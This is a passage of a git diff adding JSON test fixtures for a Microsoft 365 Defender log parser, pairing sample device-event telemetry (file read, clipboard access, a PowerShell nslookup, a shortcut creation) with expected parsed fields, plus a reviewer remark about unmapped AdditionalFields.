"05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files 
(x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + 
"info" + ] + }, + "@timestamp": "2024-11-12T10:17:24.858829Z", + "action": { + "properties": { + "AccountSid": "S-1-2-3", + "process": { + "parent": { + "AccountObjectId": "12345678-abcd-1234-ef09-abcdef123456", + "CommandLine": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "FileSize": 3316224, + "LogonId": "5223047", + "VersionInfoCompanyName": "Test Corporation", + "VersionInfoFileDescription": "Browser EXE", + "VersionInfoInternalFileName": "Browser.EXE", + "VersionInfoOriginalFileName": "Browser.EXE", + "VersionInfoProductName": "Test Product", + "VersionInfoProductVersion": "1, 0, 0, 1" + } + } + }, + "type": "SensitiveFileRead" + }, + "file": { + "directory": "C:\\Log", + "name": "FileName.mdb", + "size": 286720 + }, + "host": { + "id": "abcdef0123456789", + "name": "user.company.local" + }, + "microsoft": { + "defender": { + "report": { + "id": "73291" + } + } + }, + "process": { + "name": "FileName.mdb", + "parent": { + "args": [ + "/DBMode", + "/Network", + "/ProjectID", + "/Ticket", + "0", + "0", + "12345678-1234-5678-9012-345678901234", + "123456789" + ], + "command_line": "\"Browser.exe\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0", + "executable": "c:\\program files (x86)\\browser.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "browser.exe", + "pid": 1328, + "start": "2024-11-12T10:17:23.990532Z", + "user": { + "domain": "company", + "email": "USERNAME@COMPANY.COM", + "id": "S-1-2-3", + "name": "username" + }, + "working_directory": "c:\\program files (x86)" + }, + "working_directory": "C:" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} 
\ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json similarity index 98% rename from Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json rename to Microsoft/microsoft-365-defender/tests/test_device_events_2.json index 1f1351d52..494baa569 100644 --- a/Microsoft/microsoft-365-defender/tests/test_deivce_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_2.json @@ -16,7 +16,11 @@ "@timestamp": "2024-10-22T15:09:08.851712Z", "action": { "properties": { - "InitiatingProcessLogonId": "0" + "process": { + "parent": { + "LogonId": "0" + } + } }, "type": "ScriptContent" }, @@ -38,10 +42,9 @@ }, "process": { "parent": { - "pid": 0 - }, - "pid": 417271, - "start": "2024-10-22T15:09:08.624070Z" + "pid": 417271, + "start": "2024-10-22T15:09:08.624070Z" + } }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json new file mode 100644 index 000000000..c34cefa50 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json 
@@ -0,0 +1,83 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"File
Size\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T09:49:58.3460812Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T09:49:02.3098089Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.company.fr\",\"ReportId\":157950,\"InitiatingProcessId\":12824,\"InitiatingProcessCreationTime\":\"2024-11-12T10:09:31.1004556Z\",\"InitiatingProcessCommandLine\":\"\\\"OUTLOOK.EXE\\\" \",\"InitiatingProcessParentFileName\":\"exec.exe\",\"InitiatingProcessParentId\":18840,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:44:15.1503958Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"outlook.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files\\\\microsoft 
office\\\\root\\\\outlook.exe\",\"InitiatingProcessAccountName\":\"john.doe\",\"InitiatingProcessAccountDomain\":\"account-domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"GetClipboardData\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":389220681,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"john.doe@account-domain.fr\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-efab-56789123abcd\",\"FileSize\":null,\"InitiatingProcessFileSize\":44152968,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Outlook\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"Outlook\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Outlook.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft Outlook\",\"InitiatingProcessSessionId\":12,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:19:26.5027772Z\",\"MachineGroup\":\"All_Win10_11\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": 
"device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:19:26.502777Z", + "action": { + "properties": { + "process": { + "AccountObjectId": "12345678-abcd-1234-efab-56789123abcd", + "CommandLine": "\"OUTLOOK.EXE\" ", + "FileSize": 44152968, + "LogonId": "389220681", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Microsoft Outlook", + "VersionInfoInternalFileName": "Outlook", + "VersionInfoOriginalFileName": "Outlook.exe", + "VersionInfoProductName": "Microsoft Outlook", + "VersionInfoProductVersion": "16.0.17928.20216" + } + }, + "type": "GetClipboardData" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.company.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "157950" + } + } + }, + "process": { + "command_line": "\"OUTLOOK.EXE\" ", + "executable": "c:\\program files\\microsoft office\\root\\outlook.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "outlook.exe", + "parent": { + "name": "exec.exe", + "pid": 18840, + "start": "2024-11-12T08:44:15.150395Z" + }, + "pid": 12824, + "start": "2024-11-12T10:09:31.100455Z", + "user": { + "domain": "account-domain", + "email": "john.doe@account-domain.fr", + "id": "S-1-2-3", + "name": "john.doe" + }, + "working_directory": "c:\\program files\\microsoft office\\root" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json new file mode 100644 index 000000000..ea0ddb0df --- /dev/null 
+++ b/Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json 
@@ -0,0 +1,83 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 
1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 
"{\"time\":\"2024-11-12T10:18:46.3194193Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:17:19.1406475Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"device.name.fr\",\"ReportId\":134294,\"InitiatingProcessId\":27568,\"InitiatingProcessCreationTime\":\"2024-11-12T10:15:16.4871111Z\",\"InitiatingProcessCommandLine\":\"powershell.exe\",\"InitiatingProcessParentFileName\":\"WindowsTerminal.exe\",\"InitiatingProcessParentId\":884,\"InitiatingProcessParentCreationTime\":\"2024-11-12T09:20:42.8246765Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"powershell.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"domain\",\"SHA1\":null,\"MD5\":null,\"FileName\":null,\"FolderPath\":null,\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"Command\\\":\\\"nslookup.exe user01-domain.USER01.local 
1.2.3.4\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"PowerShellCommand\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":398124703,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JDOE@domain.fr\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-5678-abcd-ef0123456789\",\"FileSize\":null,\"InitiatingProcessFileSize\":450560,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft\u00ae Windows\u00ae Operating System\",\"InitiatingProcessVersionInfoProductVersion\":\"10.0.22621.3085\",\"InitiatingProcessVersionInfoInternalFileName\":\"POWERSHELL\",\"InitiatingProcessVersionInfoOriginalFileName\":\"PowerShell.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Windows PowerShell\",\"InitiatingProcessSessionId\":6,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:15:59.5508823Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-12T10:15:59.550882Z", + "action": { + "properties": { + "process": { + "AccountObjectId": "abcdef90-1234-5678-abcd-ef0123456789", + "CommandLine": "powershell.exe", + 
"FileSize": 450560, + "LogonId": "398124703", + "VersionInfoCompanyName": "Microsoft Corporation", + "VersionInfoFileDescription": "Windows PowerShell", + "VersionInfoInternalFileName": "POWERSHELL", + "VersionInfoOriginalFileName": "PowerShell.EXE", + "VersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System", + "VersionInfoProductVersion": "10.0.22621.3085" + } + }, + "type": "PowerShellCommand" + }, + "host": { + "id": "abcdef0123456789", + "name": "device.name.fr" + }, + "microsoft": { + "defender": { + "report": { + "id": "134294" + } + } + }, + "process": { + "command_line": "powershell.exe", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "44543e0c6f30415c670c1322e61ca68602d58708", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "powershell.exe", + "parent": { + "name": "WindowsTerminal.exe", + "pid": 884, + "start": "2024-11-12T09:20:42.824676Z" + }, + "pid": 27568, + "start": "2024-11-12T10:15:16.487111Z", + "user": { + "domain": "domain", + "email": "JDOE@domain.fr", + "id": "S-1-2-3", + "name": "jdoe" + }, + "working_directory": "c:\\windows\\system32\\windowspowershell\\v1.0" + }, + "related": { + "hash": [ + "44543e0c6f30415c670c1322e61ca68602d58708", + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + ] + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json new file mode 100644 index 000000000..37a646715 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json 
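Review bot: The expected output pins that `AdditionalFields` is not mapped: the input carries `{"Command":"nslookup.exe user01-domain.USER01.local 1.2.3.4"}`, the command actually executed, while the only command line surfaced is `"command_line": "powershell.exe"`. For a PowerShellCommand event that is the field a detection rule would key on, so if the parser is meant to surface it the fixture should assert it, for example `"Command": "nslookup.exe user01-domain.USER01.local 1.2.3.4"` under `action.properties` (placement to be confirmed against the parser). The ShellLinkCreateFileEvent hunk that follows has the same gap: its `AdditionalFields` (`ShellLinkRunAsAdmin`, `IsOnRemovableMedia`, `ShellLinkShowCommand`) are absent from the expected output. If dropping `AdditionalFields` is deliberate, recording that in the README or the fixture name would stop the next change from reading it as a regression.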
@@ -0,0 +1,103 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n \\\"I:\\\\COMPANY\\\\Service\\\\FILE.doc\\\" /o \\\"\\\"\",\"InitiatingProcessParentFileName\":\"explorer.exe\",\"InitiatingProcessParentId\":14616,\"InitiatingProcessParentCreationTime\":\"2024-11-12T08:47:41.9520775Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"winword.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\microsoft 
office\\\\root\\\\office16\\\\winword.exe\",\"InitiatingProcessAccountName\":\"jdoe\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":\"f1d50e0d3e0ba197baf152614e0cd94487a1142e\",\"MD5\":\"5d5608654828cf052ba013b3c37cbb61\",\"FileName\":\"FILENAME.LNK\",\"FolderPath\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":\"{\\\"FileSizeInBytes\\\":914,\\\"VolumeGuidPath\\\":\\\"\\\\\\\\\\\\\\\\?\\\\\\\\Volume{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\\\",\\\"IsOnRemovableMedia\\\":false,\\\"ShellLinkRunAsAdmin\\\":false,\\\"ShellLinkShowCommand\\\":\\\"SW_SHOWNORMAL\\\"}\",\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323\",\"SHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"RemoteUrl\":null,\"ProcessCreationTime\":\"2024-11-06T16:05:23.1138023Z\",\"ProcessTokenElevation\":null,\"ActionType\":\"ShellLinkCreateFileEvent\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":8066492,\"AccountSid\":null,\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"JOHNDOE@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"abcdef90-1234-abcd-5678-abcdef123456\",\"FileSize\":null,\"InitiatingProcessFileSize\":1621656,\"InitiatingProcessVersionInfoCompanyName\":\"Microsoft Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Microsoft Office\",\"InitiatingProcessVersionInfoProductVersion\":\"16.0.17928.20216\",\"InitiatingProcessVersionInfoInternalFileName\":\"WinWord\",\"InitiatingProcessVersionInfoOriginalFileName\":\"WinWord.exe\",\"InitiatingProcessVersionInfoFileDescription\":\"Microsoft 
Word\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:23.3307226Z\",\"MachineGroup\":\"UnassignedGroup\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-11-12T10:18:30.9849876Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:00.0874785Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":22722,\"InitiatingProcessId\":20948,\"InitiatingProcessCreationTime\":\"2024-11-12T10:02:28.7779103Z\",\"InitiatingProcessCommandLine\":\"\\\"WINWORD.EXE\\\" /n 